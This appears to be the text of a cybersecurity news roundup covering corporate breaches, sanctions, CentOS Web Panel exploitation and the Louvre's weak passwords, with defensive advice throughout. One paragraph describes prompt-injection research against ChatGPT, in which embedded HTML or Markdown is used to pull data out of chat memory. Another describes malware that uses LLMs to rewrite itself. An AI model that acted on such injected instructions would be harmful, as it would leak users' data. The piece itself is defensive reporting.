Good Morning Security Gang
Yesterday was one of those incredible days that remind me why I love this community so much. Between CISO XC’s first Atlanta event and FutureCon, where I had the privilege of keynoting and sitting on a panel, I left both events feeling inspired. The conversations, the energy, the ideas — just phenomenal.
Now, today’s show is jam-packed: we’ve got a major breach at Hyundai AutoEver America, the University of Pennsylvania confirms data theft after that wild “we’re stupid” hacker email, and Marks & Spencer’s profits get wiped out by a cyberattack. We’ll talk SonicWall, North Korea, the Louvre’s epic password fail, and yes — malware now using AI to evolve itself.
Grab your espresso — double shot, of course — and let’s roll. Coffee cup cheers, y’all!
Hyundai AutoEver America Breach Exposes Drivers’ SSNs and Licenses
Hyundai’s U.S. IT affiliate, AutoEver America (HAEA), has confirmed a breach impacting both employees and vehicle owners. Attackers were inside the network from February 22 to March 2, accessing names, Social Security numbers, and driver’s license data.
There’s no ransomware claim yet, but this type of exposure poses clear identity theft and registration fraud risks. HAEA runs digital systems for over 2.7 million vehicles and employs 5,000 people across the U.S. Supply chain partners — including Kia Motors — could also be exposed.
If you’re in that ecosystem, this is the moment to monitor for title fraud, reset credentials, and watch for phishing attempts posing as Hyundai service updates.
University of Pennsylvania Data Breach Confirms Donor Database Theft
Remember that bizarre hacker email that went viral saying “We got hacked and we’re stupid”? Turns out, it was real. The University of Pennsylvania has confirmed a 1.71GB data theft through social engineering and compromised SSO credentials. Attackers accessed Salesforce, SAP BI, Box, and SharePoint, stealing up to 1.2 million donor records and then using Penn’s Salesforce Marketing Cloud to email everyone from the inside.
“Something within how we manage identities is absolutely broken, and we ought to reevaluate it. Because at the end of the day, they’re not hacking in, they’re logging in.” James Azar
This incident highlights that the identity layer is broken — attackers aren’t hacking in, they’re logging in. Penn now faces potential donor trust erosion, alumni phishing campaigns, and long-term reputational damage.
Organizations using SSO need to detect anomalous export jobs, enforce role-based restrictions, and most importantly — train high-privilege users to spot credential theft attempts.
Marks & Spencer Cyberattack Wipes Out First-Half Profits
British retailer Marks & Spencer has confirmed that its cyberattack earlier this year erased all H1 profits, citing a direct hit to IT systems and sales operations. The incident disrupted both online orders and in-store processing, while overhead costs — from rent to payroll — remained constant.
Executives estimate the financial impact at roughly £100 million ($130M). This is the type of real-world evidence CISOs can use in boardrooms to connect cyber resilience to business continuity.
If you’re not running regular tabletop exercises focused on downtime recovery, your cyber insurance won’t save your P&L when the next disruption hits.
SonicWall Breach Linked to State-Sponsored Actor
The September SonicWall breach, which exposed firewall configuration and backup data, is now confirmed to be the work of a nation-state actor. Attackers exploited an API flaw to exfiltrate cloud-stored configs and VPN secrets.
While SonicWall insists that firmware and source code weren’t compromised, stolen configuration data could enable lateral movement and VPN hijacking.
If you’re a SonicWall customer:
Regenerate all API keys, VPN credentials, and PSKs.
Enable MFA on all management accounts.
Encrypt configs at rest and review retention periods.
This is a serious one — treat it like an active risk, not a resolved incident.
U.S. Sanctions North Korean IT Workers and Crypto Launderers
The U.S. Treasury has sanctioned 10 DPRK-linked individuals and entities for laundering $12.7 million via crypto theft and fake IT worker identities. The scheme used false personas and contract work to funnel revenue into Pyongyang’s weapons program.
If your company hires remote developers or contractors, screen identity verification closely — this is becoming a top-tier supply chain infiltration risk. DPRK “ghost contractors” have already been found inside multiple Western tech firms.
China Executes Five Myanmar Scam Kingpins
In a shocking development, China has sentenced five leaders of Myanmar-based scam compounds to death, with nine others receiving life sentences. These compounds have been behind thousands of romance scams, phishing operations, and crypto mule schemes targeting global victims.
While Beijing’s move signals a crackdown on Southeast Asia’s scam economy, it’s also a glimpse into the brutal extremes of authoritarian justice. As I said on the show — this is what communism looks like when it polices crime.
Yes, these were criminals. But capital punishment for cyber scams? That’s a chilling precedent.
Europol Busts Global Fraud Ring Laundering $700M
Europol announced the arrest of 18 individuals across Germany, Spain, Italy, Cyprus, and Singapore connected to a massive fraud and money-laundering operation. The group used 4.3 million stolen cards to create 19 million fake subscriptions on dating and streaming sites — charging victims small, recurring fees to stay hidden.
This operation ran for five years (2016–2021) before being dismantled. Another strong reminder that insider cooperation and payment ecosystem abuse remain key enablers of large-scale financial crime.
CISA Warns of Active Exploitation in CentOS Web Panel
CISA has issued an emergency alert warning that a Remote Command Execution (RCE) vulnerability in CentOS Web Panel (CWP) is being actively exploited in the wild. Attackers are using it to deploy web shells and ransomware payloads.
If you still run CWP, patch immediately or migrate off. Restrict admin panel exposure, audit for unexpected root-owned files, and rotate credentials. CWP systems are low-hanging fruit right now — don’t be the next headline.
Malware Now Using AI to Morph and Evade Detection
Google’s threat intelligence team reports that malware families are now leveraging LLMs to self-modify during execution. Known variants like PromptFlox, FruitShells, and QuietVault dynamically rewrite their own code using AI models to evade signature-based detection.
This means legacy EDRs and static signatures are effectively blind. The fix? Shift to behavior-based EDR, implement script blocking, and restrict outbound AI API calls.
Developers should use short-lived tokens and apply secret scanning across GitHub and NPM — those are now being directly targeted.
ChatGPT Exploited via Prompt Injection and Browser Memory
Researchers at Tenable demonstrated that attackers can steal data from ChatGPT chat histories via malicious prompt injections, browser-based memory leaks, and CSP bypasses. By abusing embedded HTML or Markdown, adversaries can exfiltrate sensitive data stored in LLM memory or CRM-integrated workflows.
The solution is simple but strict:
Treat LLMs like browsers.
Sanitize outputs, strip HTML, and whitelist domains.
Log and monitor API calls for abnormal tool requests.
AI tools are powerful, but they’re not immune to exploitation — guardrails are the new firewall.
The Louvre’s Password Was... “Louvre”
Yes, you heard that right. The Louvre Museum’s surveillance system password was literally “Louvre” — and another key system was secured with the password “Thales.”
The revelation comes amid an ongoing investigation into the October 18th art theft, where priceless artifacts were stolen. As James put it on the show:
“If your museum password is the same as your name, you don’t need hackers — you’ve already invited them in.” James Azar
This is the perfect — and painful — reminder that complacency is the enemy of security. Basic hygiene matters. Always has, always will.
Action List
🚗 Monitor identity theft risk if affected by Hyundai AutoEver.
🎓 Reassess SSO and MFA workflows — “logging in” is the new breach.
🧱 Patch CWP and SonicWall systems immediately.
💼 Run resilience tabletop exercises to protect profit continuity.
💰 Screen remote contractors for false identities and hidden nation-state ties.
🤖 Implement egress filters for AI APIs to block self-modifying malware.
🧠 Treat LLMs like browsers — sanitize, restrict, and monitor.
🗝️ Audit all admin passwords — and for the love of all things secure, don’t name them after your company.
James Azar’s CISO’s Take
Today’s stories prove that our threat landscape isn’t just evolving — it’s expanding in every direction. From Hyundai’s data breach to AI-driven malware mutation, the common thread is identity failure. Whether it’s SSO abuse, hardcoded passwords, or unverified remote hires, our attack surface is defined by who we let in — not just what we build.
“Complacency is the enemy. It always has been. It always will be. And humans are complacent by nature. And in cyber, you’re not allowed to be complacent.” James Azar
My biggest takeaway? Cybersecurity isn’t about perfection; it’s about preparation. Marks & Spencer’s lost profits and Penn’s donor chaos show what happens when downtime becomes business time. And the Louvre… well, that’s what happens when security is treated as a checkbox instead of a culture.
So stay sharp, Security Gang. Rotate your passwords, patch your systems, and maybe — just maybe — name your next password something other than “Louvre.”
Until Monday, stay caffeinated and stay cyber safe.
